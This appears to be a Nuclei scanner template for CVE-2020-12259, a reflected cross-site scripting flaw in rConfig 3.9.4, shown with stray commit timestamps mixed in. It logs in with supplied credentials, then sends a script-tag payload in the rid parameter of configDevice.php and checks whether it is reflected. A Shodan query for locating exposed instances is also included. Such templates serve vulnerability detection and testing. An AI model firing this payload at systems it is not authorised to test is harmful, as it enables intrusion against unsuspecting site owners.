2023-10-17 07:20:28 +00:00
id : CVE-2020-12259
2023-10-17 17:52:26 +00:00
2023-10-17 07:20:28 +00:00
info :
name : rConfig 3.9.4 - Cross-Site Scripting
author : r3Y3r53
severity : medium
description : |
rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php
reference :
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8
- https://nvd.nist.gov/vuln/detail/CVE-2020-12259
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
cve-id : CVE-2020-12259
cwe-id : CWE-79
2023-10-17 17:52:26 +00:00
epss-score : 0.88283
epss-percentile : 0.98321
cpe : cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:*
2023-10-17 07:20:28 +00:00
metadata :
verified : "true"
2023-10-17 17:52:26 +00:00
max-request : 3
vendor : rconfig
product : rconfig
2023-10-17 07:20:28 +00:00
shodan-query : http.title:"rConfig"
tags : cve,cve2020,rconfig,authenticated,xss
http :
- raw :
- |
GET /login.php HTTP/1.1
Host : {{Hostname}}
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
- |
GET /configDevice.php?rid="><script>alert(document.domain)</script> HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
host-redirects : true
matchers :
- type : dsl
dsl :
- 'status_code_3 == 200'
- 'contains(body_3, "<script>alert(document.domain)</script>") && contains(body_3, "rConfig - Configuration Management")'
- 'contains(content_type_3, "text/html")'
condition : and